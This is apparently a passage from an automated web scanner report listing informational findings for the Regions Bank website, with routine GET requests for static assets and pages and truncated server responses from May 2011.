| GET /App_Themes/IE6/img Accept: */* Accept-Language: en-US Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E) Proxy-Connection: Keep-Alive Host: www.regions.com | 
| HTTP/1.1 200 OK Set-Cookie: WWW.REGIONS.COM-HTTP Content-Length: 9783 Content-Type: image/gif Last-Modified: Thu, 23 Sep 2010 14:37:00 GMT Accept-Ranges: bytes ETag: "08edcc72c5bcb1:0" Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Mon, 16 May 2011 15:24:04 GMT GIF89a..^.......Y....T.. ...[SNIP]... | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | http://www.regions.com | 
| Path: | /App_Themes/Promotion/Ems | 
| GET /App_Themes/Promotion/Ems Host: www.regions.com Proxy-Connection: keep-alive Referer: http://www.regions.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ASP.NET_SessionId | 
| HTTP/1.1 200 OK Set-Cookie: WWW.REGIONS.COM-HTTP Content-Type: text/css Last-Modified: Tue, 15 Mar 2011 18:07:58 GMT Accept-Ranges: bytes ETag: "0d314ea3be3cb1:0" Vary: Accept-Encoding Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Mon, 16 May 2011 15:17:25 GMT Content-Length: 5329 .../********************* /* Web Channel Services: Promotion /************************ .foo{} /************************ /* HTML General /********************** ...[SNIP]... | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | http://www.regions.com | 
| Path: | /App_Themes/Promotion/img | 
| GET /App_Themes/Promotion/img Host: www.regions.com Proxy-Connection: keep-alive Referer: http://www.regions.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ASP.NET_SessionId | 
| HTTP/1.1 200 OK Set-Cookie: WWW.REGIONS.COM-HTTP Content-Length: 68 Content-Type: image/gif Last-Modified: Fri, 25 Feb 2011 17:31:00 GMT Accept-Ranges: bytes ETag: "0629dc411d5cb1:0" Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Mon, 16 May 2011 15:17:28 GMT GIF89a.......VWQTTRV | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | http://www.regions.com | 
| Path: | /App_Themes/Promotion/img | 
| GET /App_Themes/Promotion/img Host: www.regions.com Proxy-Connection: keep-alive Referer: http://www.regions.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ASP.NET_SessionId | 
| HTTP/1.1 200 OK Set-Cookie: WWW.REGIONS.COM-HTTP Content-Length: 799 Content-Type: image/gif Last-Modified: Thu, 23 Sep 2010 14:37:00 GMT Accept-Ranges: bytes ETag: "08edcc72c5bcb1:0" Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Mon, 16 May 2011 15:17:31 GMT GIF89a.....`............. ...[SNIP]... | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | http://www.regions.com | 
| Path: | /App_Themes/Promotion/img | 
| GET /App_Themes/Promotion/img Host: www.regions.com Proxy-Connection: keep-alive Referer: http://www.regions.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ASP.NET_SessionId | 
| HTTP/1.1 200 OK Set-Cookie: WWW.REGIONS.COM-HTTP Content-Length: 8278 Content-Type: image/gif Last-Modified: Thu, 23 Sep 2010 14:37:00 GMT Accept-Ranges: bytes ETag: "08edcc72c5bcb1:0" Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Mon, 16 May 2011 15:17:29 GMT GIF89a..,....N........^.2 ...[SNIP]... | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | http://www.regions.com | 
| Path: | /Img/sm_558800_oo.gif | 
| GET /Img/sm_558800_oo.gif HTTP/1.1 Host: www.regions.com Proxy-Connection: keep-alive Referer: http://www.regions.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ASP.NET_SessionId | 
| HTTP/1.1 200 OK Set-Cookie: WWW.REGIONS.COM-HTTP Content-Length: 597 Content-Type: image/gif Last-Modified: Thu, 23 Sep 2010 14:37:00 GMT Accept-Ranges: bytes ETag: "08edcc72c5bcb1:0" Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Mon, 16 May 2011 15:16:53 GMT GIF89a . ....fff...!..NETSCAPE2.0. .!.. ....,...... ...........s.M. .!.. ....,...... .... ...[SNIP]... | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | http://www.regions.com | 
| Path: | /JS/cmbd-jquery.min.js | 
| GET /JS/cmbd-jquery.min.js HTTP/1.1 Host: www.regions.com Proxy-Connection: keep-alive Referer: http://www.regions.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ASP.NET_SessionId | 
| HTTP/1.1 200 OK Set-Cookie: WWW.REGIONS.COM-HTTP Content-Type: application/x-javascript Last-Modified: Wed, 27 Apr 2011 18:40:58 GMT Accept-Ranges: bytes ETag: "0194a6a5cc1:0" Vary: Accept-Encoding Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Mon, 16 May 2011 15:16:47 GMT Content-Length: 73452 ...//*********** jquery-1.4.2.min.js ******* (function(A,w){function ma(){if(!c.isReady){try{s ...[SNIP]... | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | http://www.regions.com | 
| Path: | /JS/loadMedia.js | 
| GET /JS/loadMedia.js HTTP/1.1 Host: www.regions.com Proxy-Connection: keep-alive Referer: http://www.regions.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ASP.NET_SessionId | 
| HTTP/1.1 200 OK Set-Cookie: WWW.REGIONS.COM-HTTP Content-Type: application/x-javascript Last-Modified: Tue, 05 Apr 2011 17:51:58 GMT Accept-Ranges: bytes ETag: "0338d28baf3cb1:0" Vary: Accept-Encoding Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Mon, 16 May 2011 15:17:26 GMT Content-Length: 51756 ...// (1) browser vendor: // is_nav, is_firefox, is_ie, is_opera, is_hotjava, is_webtv, is_TVNavigator, is_AOLTV // (2) browser version number: // is_major (integer indicating major version ...[SNIP]... | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | http://www.regions.com | 
| Path: | /JS/loadMedia.min.js | 
| GET /JS/loadMedia.min.js HTTP/1.1 Host: www.regions.com Proxy-Connection: keep-alive Referer: http://www.regions.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ASP.NET_SessionId | 
| HTTP/1.1 200 OK Set-Cookie: WWW.REGIONS.COM-HTTP Content-Type: application/x-javascript Last-Modified: Tue, 05 Apr 2011 18:24:58 GMT Accept-Ranges: bytes ETag: "039b9c4bef3cb1:0" Vary: Accept-Encoding Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Mon, 16 May 2011 15:16:47 GMT Content-Length: 35261 ...var agt=navigator.userAgent ...[SNIP]... | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | http://www.regions.com | 
| Path: | /about_regions/IR | 
| GET /about_regions/IR Host: www.regions.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Accept: text/html,application Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip, deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.regions.com Cookie: WWW.REGIONS.COM-HTTP | 
| HTTP/1.1 200 OK Set-Cookie: WWW.REGIONS.COM-HTTP Content-Type: text/html Last-Modified: Fri, 25 Mar 2011 02:24:58 GMT Accept-Ranges: bytes ETag: "079e7d593eacb1:0" Vary: Accept-Encoding Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Mon, 16 May 2011 15:52:26 GMT Content-Length: 612 ...<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Frameset//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta http-equiv="Content-Typ ...[SNIP]... | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | http://www.regions.com | 
| Path: | /about_regions/company | 
| GET /about_regions/company Host: www.regions.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Accept: text/html,application Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip, deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.regions.com Cookie: WWW.REGIONS.COM-HTTP | 
| HTTP/1.1 200 OK Set-Cookie: WWW.REGIONS.COM-HTTP Cache-Control: private Date: Mon, 16 May 2011 15:52:53 GMT Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Vary: Accept-Encoding Content-Length: 18578 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head id="ctl00_Head1"><titl ...[SNIP]... | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | http://www.regions.com | 
| Path: | /about_regions/email | 
| GET /about_regions/email Host: www.regions.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Accept: text/html,application Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip, deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.regions.com Cookie: WWW.REGIONS.COM-HTTP | 
| HTTP/1.1 200 OK Set-Cookie: WWW.REGIONS.COM-HTTP Cache-Control: private Date: Mon, 16 May 2011 15:48:51 GMT Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Vary: Accept-Encoding Content-Length: 20870 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head id="ctl00_Head1"><titl ...[SNIP]... | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | http://www.regions.com | 
| Path: | /about_regions/privacy | 
| GET /about_regions/privacy Host: www.regions.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Accept: text/html,application Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip, deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Cookie: WWW.REGIONS.COM-HTTP | 
| HTTP/1.1 200 OK Set-Cookie: WWW.REGIONS.COM-HTTP Cache-Control: private Date: Mon, 16 May 2011 15:43:28 GMT Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Vary: Accept-Encoding Content-Length: 20511 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head id="ctl00_Head1"><titl ...[SNIP]... | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | http://www.regions.com | 
| Path: | /about_regions/protecting | 
| GET /about_regions/protecting Host: www.regions.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Accept: text/html,application Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip, deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.regions.com Cookie: WWW.REGIONS.COM-HTTP | 
| HTTP/1.1 200 OK Set-Cookie: WWW.REGIONS.COM-HTTP Cache-Control: private Date: Mon, 16 May 2011 15:48:15 GMT Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Vary: Accept-Encoding Content-Length: 23209 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head id="ctl00_Head1"><titl ...[SNIP]... | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | http://www.regions.com | 
| Path: | /about_regions/report | 
| GET /about_regions/report Host: www.regions.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Accept: text/html,application Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip, deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.regions.com Cookie: WWW.REGIONS.COM-HTTP | 
| HTTP/1.1 200 OK Set-Cookie: WWW.REGIONS.COM-HTTP Cache-Control: private Date: Mon, 16 May 2011 15:43:40 GMT Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Vary: Accept-Encoding Content-Length: 25489 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head id="ctl00_Head1"><titl ...[SNIP]... | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | http://www.regions.com | 
| Path: | /favicon.ico | 
| GET /favicon.ico HTTP/1.1 Host: www.regions.com Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ASP.NET_SessionId | 
| HTTP/1.1 200 OK Set-Cookie: WWW.REGIONS.COM-HTTP Content-Length: 3262 Content-Type: image/x-icon Last-Modified: Tue, 21 Dec 2010 20:53:00 GMT Accept-Ranges: bytes ETag: "01e6fd51a1cb1:0" Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Mon, 16 May 2011 15:20:08 GMT ...... ..............(... ...@..................... ...[SNIP]... | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | http://www.regions.com | 
| Path: | /img/arrowGray_Small.gif | 
| GET /img/arrowGray_Small.gif HTTP/1.1 Host: www.regions.com Proxy-Connection: keep-alive Referer: http://www.regions.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ASP.NET_SessionId | 
| HTTP/1.1 200 OK Set-Cookie: WWW.REGIONS.COM-HTTP Content-Length: 68 Content-Type: image/gif Last-Modified: Thu, 23 Sep 2010 14:37:00 GMT Accept-Ranges: bytes ETag: "08edcc72c5bcb1:0" Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Mon, 16 May 2011 15:17:15 GMT GIF89a.......VWQTTRV | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | http://www.regions.com | 
| Path: | /js/_bt.js | 
| GET /js/_bt.js HTTP/1.1 Host: www.regions.com Proxy-Connection: keep-alive Referer: http://www.regions.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ASP.NET_SessionId | 
| HTTP/1.1 200 OK Set-Cookie: WWW.REGIONS.COM-HTTP Content-Type: application/x-javascript Last-Modified: Fri, 15 Apr 2011 14:08:58 GMT Accept-Ranges: bytes ETag: "0b994a976fbcb1:0" Vary: Accept-Encoding Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Mon, 16 May 2011 15:16:51 GMT Content-Length: 990 //if bt_test is true before executing this script the iframe will load on uat // //if bt_extra is declared as an associative array before executing this script all members of the array will be added ...[SNIP]... | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | http://www.regions.com | 
| Path: | /js/wtbase.js | 
| GET /js/wtbase.js HTTP/1.1 Host: www.regions.com Proxy-Connection: keep-alive Referer: http://www.regions.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ASP.NET_SessionId | 
| HTTP/1.1 200 OK Set-Cookie: WWW.REGIONS.COM-HTTP Content-Type: application/x-javascript Last-Modified: Fri, 15 Apr 2011 14:09:58 GMT Accept-Ranges: bytes ETag: "0ff57cd76fbcb1:0" Vary: Accept-Encoding Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Mon, 16 May 2011 15:16:50 GMT Content-Length: 13718 function DcsInit(){ this.dcsid="dcs4b71f this.domain="statse this.enabled=true; this.exre=(function(){ if (window.RegExp){ return(new RegExp( ...[SNIP]... | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | http://www.regions.com | 
| Path: | /personal_banking/email | 
| GET /personal_banking/email Host: www.regions.com Proxy-Connection: keep-alive Referer: http://www.regions.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ASP.NET_SessionId | 
| HTTP/1.1 200 OK Set-Cookie: WWW.REGIONS.COM-HTTP Cache-Control: private Date: Mon, 16 May 2011 15:20:27 GMT Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Vary: Accept-Encoding Content-Length: 22072 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head id="ctl00_Head1"><titl ...[SNIP]... | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | http://www.regions.com | 
| Path: | /personal_banking/get | 
| GET /personal_banking/get Host: www.regions.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ASP.NET_SessionId | 
| HTTP/1.1 200 OK Set-Cookie: WWW.REGIONS.COM-HTTP Cache-Control: private Date: Mon, 16 May 2011 15:20:39 GMT Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Vary: Accept-Encoding Content-Length: 5948 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head id="ctl00_Head1"><link ...[SNIP]... | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | http://www.regions.com | 
| Path: | /personal_banking/get | 
| GET /personal_banking/get Host: www.regions.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ASP.NET_SessionId | 
| HTTP/1.1 200 OK Set-Cookie: WWW.REGIONS.COM-HTTP Cache-Control: private Date: Mon, 16 May 2011 15:20:36 GMT Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Vary: Accept-Encoding Content-Length: 6313 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head id="ctl00_Head1"><link ...[SNIP]... | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | http://www.regions.com | 
| Path: | /personal_banking/get | 
| GET /personal_banking/get Host: www.regions.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ASP.NET_SessionId | 
| HTTP/1.1 200 OK Set-Cookie: WWW.REGIONS.COM-HTTP Cache-Control: private Date: Mon, 16 May 2011 15:20:39 GMT Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Vary: Accept-Encoding Content-Length: 5688 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head id="ctl00_Head1"><link ...[SNIP]... | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | http://www.regions.com | 
| Path: | /personal_banking/get | 
| GET /personal_banking/get Host: www.regions.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ASP.NET_SessionId | 
| HTTP/1.1 200 OK Set-Cookie: WWW.REGIONS.COM-HTTP Cache-Control: private Date: Mon, 16 May 2011 15:20:37 GMT Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Vary: Accept-Encoding Content-Length: 6038 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head id="ctl00_Head1"><link ...[SNIP]... | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | http://www.regions.com | 
| Path: | /personal_banking/get | 
| GET /personal_banking/get Host: www.regions.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ASP.NET_SessionId | 
| HTTP/1.1 200 OK Set-Cookie: WWW.REGIONS.COM-HTTP Cache-Control: private Date: Mon, 16 May 2011 15:20:40 GMT Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Vary: Accept-Encoding Content-Length: 5892 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head id="ctl00_Head1"><link ...[SNIP]... | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | http://www.regions.com | 
| Path: | /personal_banking/get | 
| GET /personal_banking/get Host: www.regions.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ASP.NET_SessionId | 
| HTTP/1.1 200 OK Set-Cookie: WWW.REGIONS.COM-HTTP Cache-Control: private Date: Mon, 16 May 2011 15:20:36 GMT Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Vary: Accept-Encoding Content-Length: 6165 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head id="ctl00_Head1"><link ...[SNIP]... | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | http://www.regions.com | 
| Path: | /personal_banking/loans | 
| GET /personal_banking/loans Host: www.regions.com Proxy-Connection: keep-alive Referer: http://www.regions.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ASP.NET_SessionId | 
| HTTP/1.1 200 OK Set-Cookie: WWW.REGIONS.COM-HTTP Cache-Control: private Date: Mon, 16 May 2011 15:20:32 GMT Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Vary: Accept-Encoding Content-Length: 21828 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head id="ctl00_Head1"><titl ...[SNIP]... | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | http://www.regions.com | 
| Path: | /personal_banking/online | 
| GET /personal_banking/online Host: www.regions.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: WWW.REGIONS.COM-HTTP | 
| HTTP/1.1 200 OK Set-Cookie: WWW.REGIONS.COM-HTTP Cache-Control: private Date: Mon, 16 May 2011 15:19:43 GMT Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Vary: Accept-Encoding Content-Length: 21562 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head id="ctl00_Head1"><titl ...[SNIP]... | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | http://www.regions.com | 
| Path: | /personal_banking/online | 
| GET /personal_banking/online Host: www.regions.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ASP.NET_SessionId | 
| HTTP/1.1 200 OK Set-Cookie: WWW.REGIONS.COM-HTTP Cache-Control: private Date: Mon, 16 May 2011 15:20:18 GMT Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Vary: Accept-Encoding Content-Length: 22388 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head id="ctl00_Head1"><titl ...[SNIP]... | 
